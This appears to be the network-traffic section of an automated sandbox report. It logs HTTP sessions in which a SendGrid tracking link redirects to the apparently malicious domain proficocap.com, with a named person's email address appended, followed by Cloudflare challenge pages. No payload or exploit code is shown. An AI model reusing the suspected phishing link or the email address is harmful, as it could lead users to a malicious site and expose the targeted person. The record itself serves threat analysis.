                                                                          • slscr.update.microsoft.com
                                                                          • https:
                                                                            • challenges.cloudflare.com
                                                                            • cdnjs.cloudflare.com
                                                                            • logo.clearbit.com
                                                                            • image.thum.io
                                                                          • login.live.com
                                                                          • otelrules.azureedge.net
                                                                          • arc.msn.com
                                                                          • tse1.mm.bing.net
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.44973923.218.208.109443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2024-12-08 19:50:20 UTC479INHTTP/1.1 200 OK
                                                                          Content-Type: application/octet-stream
                                                                          Server: Kestrel
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                          X-Ms-Region: prod-neu-z1
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          X-OSID: 2
                                                                          X-CID: 2
                                                                          X-CCC: GB
                                                                          Cache-Control: public, max-age=194345
                                                                          Date: Sun, 08 Dec 2024 19:50:20 GMT
                                                                          Connection: close
                                                                          X-CID: 2


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.449741167.89.118.284431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:21 UTC1037OUTGET /ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D HTTP/1.1
                                                                          Host: u48644047.ct.sendgrid.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:21 UTC251INHTTP/1.1 302 Found
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 19:50:21 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 76
                                                                          Connection: close
                                                                          Location: https://proficocap.com/#grant.ramsden@virginmoney.com
                                                                          X-Robots-Tag: noindex, nofollow
                                                                          2024-12-08 19:50:21 UTC76INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 66 69 63 6f 63 61 70 2e 63 6f 6d 2f 23 67 72 61 6e 74 2e 72 61 6d 73 64 65 6e 40 76 69 72 67 69 6e 6d 6f 6e 65 79 2e 63 6f 6d 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                          Data Ascii: <a href="https://proficocap.com/#grant.ramsden@virginmoney.com">Found</a>.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.44974223.218.208.109443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:22 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                          Range: bytes=0-2147483646
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2024-12-08 19:50:22 UTC534INHTTP/1.1 200 OK
                                                                          Content-Type: application/octet-stream
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          ApiVersion: Distribute 1.1
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                          Cache-Control: public, max-age=93374
                                                                          Date: Sun, 08 Dec 2024 19:50:22 GMT
                                                                          Content-Length: 55
                                                                          Connection: close
                                                                          X-CID: 2
                                                                          2024-12-08 19:50:22 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.449744104.21.53.1714431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:24 UTC657OUTGET / HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:25 UTC1285INHTTP/1.1 403 Forbidden
                                                                          Date: Sun, 08 Dec 2024 19:50:25 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Cross-Origin-Resource-Policy: same-origin
                                                                          Origin-Agent-Cluster: ?1
                                                                          Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                          Referrer-Policy: same-origin
                                                                          X-Content-Options: nosniff
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          cf-mitigated: challenge
                                                                          2024-12-08 19:50:25 UTC911INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 49 73 52 34 54 4f 52 6c 76 35 43 52 6f 6f 45 58 66 4b 46 5a 47 6a 39 72 72 52 4d 70 5a 32 4b 61 5a 74 41 39 46 64 54 2b 34 37 6a 4c 6a 65 55 47 58 71 73 46 7a 6d 43 55 79 55 66 79 75 4d 65 55 49 44 4c 56 79 50 34 61 54 69 6b 2f 56 67 6f 78 49 38 63 56 67 75 45 31 4c 6e 7a 49 7a 77 44 4c 46 71 53 43 74 4f 30 36 32 2b 63 3d 24 42 34 5a 44 4a 6b 52 33 43 31 54 4d 4f 31 52 52 34 6e 37 55 71 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                          Data Ascii: cf-chl-out: IsR4TORlv5CRooEXfKFZGj9rrRMpZ2KaZtA9FdT+47jLjeUGXqsFzmCUyUfyuMeUIDLVyP4aTik/VgoxI8cVguE1LnzIzwDLFqSCtO062+c=$B4ZDJkR3C1TMO1RR4n7UqQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                          2024-12-08 19:50:25 UTC542INData Raw: 32 32 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                          Data Ascii: 22f6<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                          2024-12-08 19:50:25 UTC1369INData Raw: 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d
                                                                          Data Ascii: ple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}
                                                                          2024-12-08 19:50:25 UTC1369INData Raw: 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 70 72 6f 66 69 63 6f 63 61 70 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 65 66 34 38 63 36 65 38 39 38 34 34 31 34 27 2c 63 48 3a 20 27 65 59 73 59 41 74 79 2e 5a 4f 34 73 4d 31 44 36 57 4d 59 4f 67 45 50 67 73 65 52 78 5f 46 63 6c 68 76 39 42 62 33 72 6e 50 37 55 2d 31 37 33 33 36 38 37 34 32 35 2d 31 2e 32 2e 31 2e 31 2d 35 30 6e 5a 56 4d 63 51
                                                                          Data Ascii: ipt and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "proficocap.com",cType: 'managed',cRay: '8eef48c6e8984414',cH: 'eYsYAty.ZO4sM1D6WMYOgEPgseRx_Fclhv9Bb3rnP7U-1733687425-1.2.1.1-50nZVMcQ


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.449740167.89.118.284431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:25 UTC1037OUTGET /ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D HTTP/1.1
                                                                          Host: u48644047.ct.sendgrid.net
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:25 UTC251INHTTP/1.1 302 Found
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 19:50:25 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 76
                                                                          Connection: close
                                                                          Location: https://proficocap.com/#grant.ramsden@virginmoney.com
                                                                          X-Robots-Tag: noindex, nofollow
                                                                          2024-12-08 19:50:25 UTC76INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 66 69 63 6f 63 61 70 2e 63 6f 6d 2f 23 67 72 61 6e 74 2e 72 61 6d 73 64 65 6e 40 76 69 72 67 69 6e 6d 6f 6e 65 79 2e 63 6f 6d 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                          Data Ascii: <a href="https://proficocap.com/#grant.ramsden@virginmoney.com">Found</a>.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.44974635.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:26 UTC541OUTOPTIONS /report/v4?s=NtBqaQHfiWWUjgRK%2FdXcPZXeDWXock6mo7Tw%2BIVyfVw2kgvcR5x%2Fwxet3SMCdTYMH51jspIR7N6pOfuOGkUZomiE9avmM15YSSiJ%2F2N1jYPSIX9If38lpWJ%2FHf9Laam1cw%3D%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Origin: https://proficocap.com
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:27 UTC336INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          access-control-max-age: 86400
                                                                          access-control-allow-methods: OPTIONS, POST
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-headers: content-length, content-type
                                                                          date: Sun, 08 Dec 2024 19:50:26 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.449748104.21.53.1714431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:28 UTC929OUTGET / HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                          sec-ch-ua-arch: "x86"
                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                          sec-ch-ua-model: ""
                                                                          sec-ch-ua-bitness: "64"
                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:28 UTC1285INHTTP/1.1 403 Forbidden
                                                                          Date: Sun, 08 Dec 2024 19:50:28 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Cross-Origin-Resource-Policy: same-origin
                                                                          Origin-Agent-Cluster: ?1
                                                                          Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                          Referrer-Policy: same-origin
                                                                          X-Content-Options: nosniff
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          cf-mitigated: challenge
                                                                          2024-12-08 19:50:28 UTC913INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 44 2b 4e 70 6f 47 50 4e 38 64 44 48 39 41 6b 38 72 54 46 32 62 61 42 66 55 4e 79 35 55 44 54 38 6c 64 76 4c 78 43 43 37 6a 32 41 41 76 47 4e 63 69 6e 2f 59 53 4a 64 77 64 52 4a 32 55 34 32 32 70 4f 53 6b 72 37 41 77 55 51 48 35 59 73 35 6b 50 6c 32 58 64 53 5a 6f 71 33 65 71 41 37 34 49 45 47 6d 4c 6c 79 5a 65 52 76 59 3d 24 67 4f 50 6d 73 6e 48 6b 35 4e 78 6c 6b 44 6c 66 4d 7a 73 66 79 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                          Data Ascii: cf-chl-out: D+NpoGPN8dDH9Ak8rTF2baBfUNy5UDT8ldvLxCC7j2AAvGNcin/YSJdwdRJ2U422pOSkr7AwUQH5Ys5kPl2XdSZoq3eqA74IEGmLlyZeRvY=$gOPmsnHk5NxlkDlfMzsfyw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                          2024-12-08 19:50:28 UTC1369INData Raw: 32 33 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                          Data Ascii: 23a1<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                          2024-12-08 19:50:28 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                          Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                          2024-12-08 19:50:28 UTC1369INData Raw: 5f 35 41 6f 34 6f 6b 59 73 65 79 4e 75 58 30 33 45 38 69 6e 6e 32 55 68 56 41 4c 6d 57 56 69 33 34 46 62 5f 4c 48 5f 74 2e 65 47 4c 30 71 4b 32 46 52 67 37 32 70 36 71 33 4f 55 31 6e 5f 38 46 50 37 79 42 77 37 61 54 6a 64 6f 64 39 5a 57 48 65 47 4b 52 37 68 69 41 62 6d 74 42 38 34 44 74 76 47 6d 36 35 50 6c 37 55 6d 52 30 48 6a 67 72 41 67 6d 69 6d 30 70 67 6c 62 2e 47 50 51 76 66 66 6a 38 76 4a 77 32 31 2e 37 6f 34 37 6f 33 6c 62 42 45 5a 36 64 43 78 50 45 4f 6a 68 77 33 45 67 52 55 30 2e 2e 6d 5a 48 4b 67 6c 48 77 32 5a 57 6d 63 6f 4e 4c 71 48 31 30 76 62 51 44 32 66 59 67 53 36 5a 6c 36 51 44 54 69 65 5a 6f 63 48 30 65 47 50 6a 46 6b 55 6b 65 39 4c 6f 45 6d 2e 50 61 73 6a 4d 64 4e 31 46 34 58 4b 6d 34 44 68 71 68 63 79 35 66 46 59 4e 42 68 63 78 41 59
                                                                          Data Ascii: _5Ao4okYseyNuX03E8inn2UhVALmWVi34Fb_LH_t.eGL0qK2FRg72p6q3OU1n_8FP7yBw7aTjdod9ZWHeGKR7hiAbmtB84DtvGm65Pl7UmR0HjgrAgmim0pglb.GPQvffj8vJw21.7o47o3lbBEZ6dCxPEOjhw3EgRU0..mZHKglHw2ZWmcoNLqH10vbQD2fYgS6Zl6QDTieZocH0eGPjFkUke9LoEm.PasjMdN1F4XKm4Dhqhcy5fFYNBhcxAY
